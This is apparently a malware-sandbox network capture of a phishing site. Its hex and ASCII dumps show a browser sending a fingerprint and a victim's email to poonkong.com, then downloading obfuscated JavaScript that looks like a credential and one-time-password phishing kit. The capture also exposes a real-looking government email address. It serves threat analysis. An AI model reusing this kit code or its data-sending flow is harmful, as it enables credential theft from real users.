                            2024-11-14 22:38:00 UTC467INHTTP/1.1 200 OK
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (lpl/EF4C)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-weu-z1
                            Cache-Control: public, max-age=238050
                            Date: Thu, 14 Nov 2024 22:37:59 GMT
                            Connection: close
                            X-CID: 2


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.449744162.144.0.2294433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:00 UTC1008OUTPOST /o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov HTTP/1.1
                            Host: poonkong.com
                            Connection: keep-alive
                            Content-Length: 139177
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: https://poonkong.com
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            Referer: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                            Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61
                            Data Ascii: MLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStrea
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 41 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f
                            Data Ascii: AElement%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeO
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 65 6e 75 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25
                            Data Ascii: enuElement%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e
                            Data Ascii: unction+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientation
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37
                            Data Ascii: ochronousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d
                            Data Ascii: e%22%2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22M
                            2024-11-14 22:38:00 UTC16384OUTData Raw: 76 69 73 69 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68
                            Data Ascii: visibilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetch
                            2024-11-14 22:38:00 UTC8105OUTData Raw: 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74
                            Data Ascii: %5Bnative+code%5D+%7D%22%2C%22createCDATASection%22%3A%22function+createCDATASection%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+creat
                            2024-11-14 22:38:01 UTC208INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:01 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Vary: Accept-Encoding
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            2024-11-14 22:38:01 UTC401INData Raw: 31 38 35 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 52 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 54 54 56 4e 56 45 46 34 54 30 52 52 4d 67 3d 3d 27 20 76 69 63 3d 27 6a 6f 65 2e 6e 67 75 79 65 6e 40 6c 65 67 2e 77 61 2e 67 6f 76 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b
                            Data Ascii: 185<!DOCTYPE html><html id='html' sti='VlZORlVqRTRNVEF5TURJMFZUTTVNVEF4T0RRMg==' vic='joe.nguyen@leg.wa.gov' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6K


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449745184.28.90.27443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:01 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                            Range: bytes=0-2147483646
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-11-14 22:38:01 UTC515INHTTP/1.1 200 OK
                            ApiVersion: Distribute 1.1
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (lpl/EF06)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-weu-z1
                            Cache-Control: public, max-age=238061
                            Date: Thu, 14 Nov 2024 22:38:01 GMT
                            Content-Length: 55
                            Connection: close
                            X-CID: 2
                            2024-11-14 22:38:01 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.449746162.144.0.2294433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:02 UTC623OUTGET /o/jsdrive.js HTTP/1.1
                            Host: poonkong.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:38:02 UTC263INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:02 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Last-Modified: Wed, 13 Nov 2024 09:31:12 GMT
                            Accept-Ranges: bytes
                            Content-Length: 182966
                            Vary: Accept-Encoding
                            Content-Type: text/javascript
                            2024-11-14 22:38:02 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 30 39 61 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 31 31 65 39 66 34 20 3d 20 5b 27 39 35 30 36 30 34 54 6b 5a 71 6a 6e 27 2c 20 27 6f 74 70 5f 63 6f 6d 6d 61 6e 64 27 2c 20 27 68 65 61 64 27 2c 20 27 6f 6e 63 6f 6e 74 65 78 74 6d 65 6e 75 27 2c 20 27 40 31 32 33 2e 27 2c 20 27 65 6d 61 69 6c 27 2c 20 27 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 27 2c 20 27 35 69 61 55 43 50 62 27 2c 20 27 2e 6f 74 70 45 72 72 6f 72 32 27 2c 20 27 52 51 5f 4f 54 50 5f 41 50 50 27 2c 20 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 20 27 40 77 65 62 2e 27 2c 20 27 55 52 4c 5c 78 32 30 45 4d 41 49 4c 3d 4e 55 4c 4c 27 2c 20 27 33 38 37 6e 63 4d 46 68 56 27 2c 20 27 2e 69 6d 67 63 6c 61 73 73 27 2c 20 27
                            Data Ascii: function _0x309a() { const _0x11e9f4 = ['950604TkZqjn', 'otp_command', 'head', 'oncontextmenu', '@123.', 'email', 'backgroundImage', '5iaUCPb', '.otpError2', 'RQ_OTP_APP', 'insertAdjacentHTML', '@web.', 'URL\x20EMAIL=NULL', '387ncMFhV', '.imgclass', '
                            2024-11-14 22:38:02 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73
                            Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20<i\x20style=\x22margin-left:\x20-12px;\x22\x20class=\x22fa-solid\x20fa-angle-down\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22s
                            2024-11-14 22:38:02 UTC8000INData Raw: 41 5a 54 58 48 56 32 33 36 45 75 2f 6a 75 34 6b 70 39 45 72 47 52 54 65 70 74 64 7a 53 42 78 4b 48 44 35 48 4f 76 7a 39 35 46 2f 4d 68 73 67 30 52 36 5a 6e 4b 6b 39 4b 58 38 63 77 6c 35 50 37 54 2f 37 61 4a 59 59 34 48 44 6b 39 58 53 35 32 63 6c 47 4f 7a 71 36 54 68 2b 64 65 6c 4d 77 6e 51 41 7a 75 43 70 54 7a 2b 51 4d 47 4c 59 54 77 43 36 49 30 70 58 6c 43 67 73 34 4f 62 74 31 70 72 5a 74 4d 55 2f 34 4d 77 77 53 66 59 64 71 38 78 4a 41 33 54 6b 77 65 75 54 78 53 6e 4a 77 2b 56 78 6d 71 35 58 57 48 6b 78 63 64 59 75 63 57 78 55 7a 33 61 6b 76 33 77 33 44 34 76 41 63 44 6b 55 77 69 70 33 4c 6f 6b 32 63 35 45 73 64 67 5a 31 77 6c 6d 48 66 76 73 4f 4f 75 59 44 68 52 6d 43 35 69 4f 43 68 4b 50 34 51 68 69 4b 31 43 65 74 57 6a 72 32 4e 59 36 36 49 62 4e 6d 37
                            Data Ascii: AZTXHV236Eu/ju4kp9ErGRTeptdzSBxKHD5HOvz95F/Mhsg0R6ZnKk9KX8cwl5P7T/7aJYY4HDk9XS52clGOzq6Th+delMwnQAzuCpTz+QMGLYTwC6I0pXlCgs4Obt1prZtMU/4MwwSfYdq8xJA3TkweuTxSnJw+Vxmq5XWHkxcdYucWxUz3akv3w3D4vAcDkUwip3Lok2c5EsdgZ1wlmHfvsOOuYDhRmC5iOChKP4QhiK1CetWjr2NY66IbNm7
                            2024-11-14 22:38:02 UTC8000INData Raw: 58 62 52 76 43 62 4a 34 36 65 58 6e 46 33 70 68 74 53 67 6b 58 2f 58 76 6e 56 2f 38 54 67 57 46 65 33 57 6e 72 49 34 2f 6a 30 72 6f 42 34 77 46 64 76 7a 5a 66 54 47 38 4f 2b 53 6b 35 33 6c 74 68 76 31 52 64 6c 59 36 2f 4f 5a 5a 6a 76 2f 53 6e 30 51 6b 35 55 68 31 62 76 42 4a 50 35 48 2f 56 57 32 45 35 44 51 67 6c 62 4e 4e 57 72 4b 53 2f 79 34 4d 43 31 6f 73 52 6e 4c 33 59 65 69 66 53 71 51 56 77 49 4b 49 44 71 64 61 32 6e 64 6d 65 66 73 39 52 4c 41 59 75 6b 34 47 61 68 31 5a 4c 4f 2f 32 30 34 32 4d 36 6a 76 6f 74 66 73 64 65 73 4b 7a 51 2f 50 6e 64 34 63 63 34 49 63 6c 35 7a 6e 58 6f 4b 78 32 71 79 74 58 38 38 37 75 51 41 37 65 6e 72 4d 32 6c 64 4c 42 54 33 55 31 49 42 43 6f 58 43 56 6c 49 68 72 38 36 63 6a 41 4c 32 68 4c 55 6f 53 36 4d 38 49 6e 7a 6c 74
                            Data Ascii: XbRvCbJ46eXnF3phtSgkX/XvnV/8TgWFe3WnrI4/j0roB4wFdvzZfTG8O+Sk53lthv1RdlY6/OZZjv/Sn0Qk5Uh1bvBJP5H/VW2E5DQglbNNWrKS/y4MC1osRnL3YeifSqQVwIKIDqda2ndmefs9RLAYuk4Gah1ZLO/2042M6jvotfsdesKzQ/Pnd4cc4Icl5znXoKx2qytX887uQA7enrM2ldLBT3U1IBCoXCVlIhr86cjAL2hLUoS6M8Inzlt
                            2024-11-14 22:38:02 UTC8000INData Raw: 2f 71 6c 47 35 78 43 32 51 33 6d 59 56 69 4d 44 77 7a 48 46 4b 62 56 45 41 54 66 31 4a 37 53 33 43 2f 4d 63 48 63 44 50 45 68 6f 42 45 65 2b 65 61 56 72 4c 54 62 37 68 6a 58 6e 32 6a 33 58 41 51 5a 50 73 43 63 34 34 47 63 45 65 4e 4e 61 68 4a 43 6a 62 31 43 57 74 6b 37 52 63 7a 33 53 4a 6d 54 47 34 7a 45 63 47 54 48 6e 51 46 6e 71 4c 44 65 65 32 31 4c 6e 61 32 44 70 6f 6a 79 49 77 4f 4f 4d 45 54 34 2b 64 54 62 47 73 43 68 43 39 7a 55 58 43 42 76 4a 37 49 69 56 4b 34 44 71 6f 48 6a 6d 4f 5a 6e 77 78 54 56 32 2b 35 56 62 5a 74 61 32 45 2f 69 44 44 63 34 50 67 37 41 7a 49 39 33 67 4f 66 43 6b 33 33 49 74 6c 57 54 57 68 56 6d 35 76 33 44 66 4c 48 61 45 42 47 54 41 62 64 48 75 38 61 42 7a 55 61 38 71 7a 42 62 6d 6f 7a 62 41 6e 73 51 53 43 42 50 61 63 41 54 47
                            Data Ascii: /qlG5xC2Q3mYViMDwzHFKbVEATf1J7S3C/McHcDPEhoBEe+eaVrLTb7hjXn2j3XAQZPsCc44GcEeNNahJCjb1CWtk7Rcz3SJmTG4zEcGTHnQFnqLDee21Lna2DpojyIwOOMET4+dTbGsChC9zUXCBvJ7IiVK4DqoHjmOZnwxTV2+5VbZta2E/iDDc4Pg7AzI93gOfCk33ItlWTWhVm5v3DfLHaEBGTAbdHu8aBzUa8qzBbmozbAnsQSCBPacATG
                            2024-11-14 22:38:02 UTC8000INData Raw: 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 64 6f 63 5f 6f 76 65 72 6c 61 79 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 74 74 6f 6d 3a 5c 78 32 30 33 30 70 78 3b 5c 78 32 32 3e 53 63 61 6e 6e 65 64 5c 78 32 30 49 6e 76 6f 69 2e 2e 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 